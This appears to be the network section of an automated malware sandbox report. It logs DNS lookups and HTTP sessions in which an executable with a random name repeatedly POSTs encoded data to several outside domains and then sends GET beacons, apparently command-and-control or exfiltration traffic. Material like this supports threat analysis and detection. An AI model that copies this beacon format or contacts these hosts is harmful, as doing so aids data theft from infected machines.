                      Jul 2, 2024 07:15:37.710782051 CEST | 1.1.1.1 | 192.168.2.5 | 0x14d7 | No error (0) | www.catherineviskadi.com |  | 217.160.0.106 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:15:51.046060085 CEST | 1.1.1.1 | 192.168.2.5 | 0x53a5 | No error (0) | www.hatercoin.online | ghs.googlehosted.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 2, 2024 07:15:51.046060085 CEST | 1.1.1.1 | 192.168.2.5 | 0x53a5 | No error (0) | ghs.googlehosted.com |  | 142.250.181.243 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:04.484921932 CEST | 1.1.1.1 | 192.168.2.5 | 0x584 | Name error (3) | www.fourgrouw.cfd | none | none | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:12.793967009 CEST | 1.1.1.1 | 192.168.2.5 | 0x97dc | No error (0) | www.bfiworkerscomp.com |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:29.500448942 CEST | 1.1.1.1 | 192.168.2.5 | 0x5cb8 | Name error (3) | www.tinmapco.com | none | none | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:38.006684065 CEST | 1.1.1.1 | 192.168.2.5 | 0xf79a | No error (0) | www.xn--fhq1c541j0zr.com |  | 43.252.167.188 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:51.558717966 CEST | 1.1.1.1 | 192.168.2.5 | 0x90f3 | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.85 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:51.558717966 CEST | 1.1.1.1 | 192.168.2.5 | 0x90f3 | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.86 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:05.550379992 CEST | 1.1.1.1 | 192.168.2.5 | 0x6780 | No error (0) | www.anuts.top |  | 23.251.54.212 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:39.632782936 CEST | 1.1.1.1 | 192.168.2.5 | 0xd3a | No error (0) | www.telwisey.info |  | 199.192.19.19 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:53.128478050 CEST | 1.1.1.1 | 192.168.2.5 | 0x95f1 | No error (0) | www.sandranoll.com |  | 213.145.228.16 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:06.481045961 CEST | 1.1.1.1 | 192.168.2.5 | 0xd0f | No error (0) | www.gipsytroya.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                      Jul 2, 2024 07:18:06.481045961 CEST | 1.1.1.1 | 192.168.2.5 | 0xd0f | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:19.888173103 CEST | 1.1.1.1 | 192.168.2.5 | 0xaa09 | No error (0) | www.helpers-lion.online |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:33.512533903 CEST | 1.1.1.1 | 192.168.2.5 | 0xded2 | No error (0) | www.dmtxwuatbz.cc |  | 172.67.210.102 | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:33.512533903 CEST | 1.1.1.1 | 192.168.2.5 | 0xded2 | No error (0) | www.dmtxwuatbz.cc |  | 104.21.45.56 | A (IP address) | IN (0x0001) | false
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.5 | 49711 | 5.44.111.162 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:21.971903086 CEST | 518 | OUT | GET /w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.hprlz.cz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:22.647814035 CEST | 769 | IN | HTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Tue, 02 Jul 2024 05:15:22 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 399
                      Connection: close
                      Location: https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Jjv=GpKhRVSHzLA8j4R&amp;66s0QHx=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1Ca0ipuJKNLUJAUyvRep5v3DJLNu0m2HizCt4wFiNb5RCLtMg==">here</a>.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.5 | 49712 | 217.160.0.106 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:37.719521046 CEST | 799 | OUT | POST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR73IkHfOzQRQWHvrDRtTxYyT1e+F3QUiqZoLa+n8=
                      Jul 2, 2024 07:15:38.378916979 CEST | 580 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:38 GMT
                      Server: Apache
                      Content-Encoding: gzip


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.5 | 49713 | 217.160.0.106 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:40.247292995 CEST | 819 | OUT | POST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS/NOtNABkDDDLbqgwqr46n2EPcZnVfsyqsKrrrx
                      Jul 2, 2024 07:15:40.896181107 CEST | 580 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:40 GMT
                      Server: Apache
                      Content-Encoding: gzip


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.5 | 49714 | 217.160.0.106 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:42.777931929 CEST | 1836 | OUT | POST /qe66/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.catherineviskadi.com
                      Origin: http://www.catherineviskadi.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.catherineviskadi.com/qe66/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:43.489996910 CEST | 580 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:43 GMT
                      Server: Apache
                      Content-Encoding: gzip


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.5 | 49715 | 217.160.0.106 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:45.309660912 CEST | 530 | OUT | GET /qe66/?66s0QHx=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv5wKSlbq5H9RfpzlUfmq/1+2mTftJij2S2gWTPvHx6aM7mw==&Jjv=GpKhRVSHzLA8j4R HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.catherineviskadi.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:45.979480028 CEST | 770 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html
                      Content-Length: 626
                      Connection: close
                      Date: Tue, 02 Jul 2024 05:15:45 GMT
                      Server: Apache
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.5 | 49717 | 142.250.181.243 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:51.064470053 CEST | 787 | OUT | POST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=JI9jU3ZYzjUNWr5AaeotbgkmbeECLwUBJaEyFMcP+Ri7nC//rkGZh46sFLVHlBRh4iJcrQhuPYPL2ByTEiRzY4brU9/4lnYJhQS+FDETIfRcSWzjheieKqQktETfDMNNrDCzOoacNVagSDHpS2NgdpGrulhu1dQNLzBqAulUF0uGCVhSSRCjU9xysvvWpKkaqsE3Luo=
                      Jul 2, 2024 07:15:51.796833038 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:51 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.5 | 49718 | 142.250.181.243 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:53.606735945 CEST | 807 | OUT | POST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Ascii: 66s0QHx=JI9jU3ZYzjUNULJAd9AtQgknU+ECQgUFJaIyFNpC+jG7knb/qgqZi46sd7UDrhRq4iNUrVBuPYrL2AiTFVlwe4bpfd/6rHYJhQS+FCgpIf5cTmDjh/ifHKQnqETfJsNJrDCBOpG2NXSgSC3pcCRjXpGtz1gn0ZJzHS9qE4QDQ1yrDjM4IzKLHddK88nh46FzwPUHV58XnoeRQpCRwBq395naaKzQ
                      Jul 2, 2024 07:15:54.344156981 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:54 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.5 | 49719 | 142.250.181.243 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:56.138314962 CEST | 1824 | OUT | POST /wf3a/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.hatercoin.online
                      Origin: http://www.hatercoin.online
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.hatercoin.online/wf3a/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:56.881730080 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:56 GMT
                      Location: https://www.hatercoin.online/wf3a/
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.5 | 49720 | 142.250.181.243 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:15:58.672972918 CEST | 526 | OUT | GET /wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.hatercoin.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:15:59.457211018 CEST | 571 | IN | HTTP/1.1 301 Moved Permanently
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 02 Jul 2024 05:15:59 GMT
                      Location: https://www.hatercoin.online/wf3a/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=EKVDXBgImxJWeZhJNsklc3Q8dq4iVG0MTaJQI9BJxmHKvH3SiDTatPSqYvMyoDFRoX1f1ApOAYKP2hecch8PPIbZZar3vE0ZmDGvAwUCcsFCeR/Dh+n2QaVtkWzZCs4EoA%3D%3D
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.5 | 49721 | 208.91.197.27 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:12.803258896 CEST | 793 | OUT | POST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.5 | 49722 | 208.91.197.27 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:15.340971947 CEST | 813 | OUT | POST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.5 | 49723 | 208.91.197.27 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:17.877194881 CEST | 1830 | OUT | POST /xzzi/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.bfiworkerscomp.com
                      Origin: http://www.bfiworkerscomp.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.bfiworkerscomp.com/xzzi/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.5 | 49724 | 208.91.197.27 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:20.513164043 CEST | 528 | OUT | GET /xzzi/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/U7l2GiVWxU2JTINSgPIAJ4NvupNBog1mPljiQYHOMEGLOA== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.bfiworkerscomp.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:24.389334917 CEST | 1236 | IN | HTTP/1.1 200 OK
                      Date: Tue, 02 Jul 2024 05:16:14 GMT
                      Server: Apache
                      Set-Cookie: vsid=928vr467442974912649925; expires=Sun, 01-Jul-2029 05:16:14 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Connection: close


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.5 | 49725 | 43.252.167.188 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:38.017252922 CEST | 799 | OUT | POST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:38.880425930 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:14 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.5 | 49726 | 43.252.167.188 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:40.545082092 CEST | 819 | OUT | POST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:16:41.402642012 CEST | 367 | IN | HTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:22:17 GMT
                      Server: Apache
                      Content-Length: 203
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.5 | 49727 | 43.252.167.188 | 80 | 6600 | C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 2, 2024 07:16:43.079508066 CEST | 1836 | OUT | POST /rm91/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.xn--fhq1c541j0zr.com
                      Origin: http://www.xn--fhq1c541j0zr.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.xn--fhq1c541j0zr.com/rm91/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
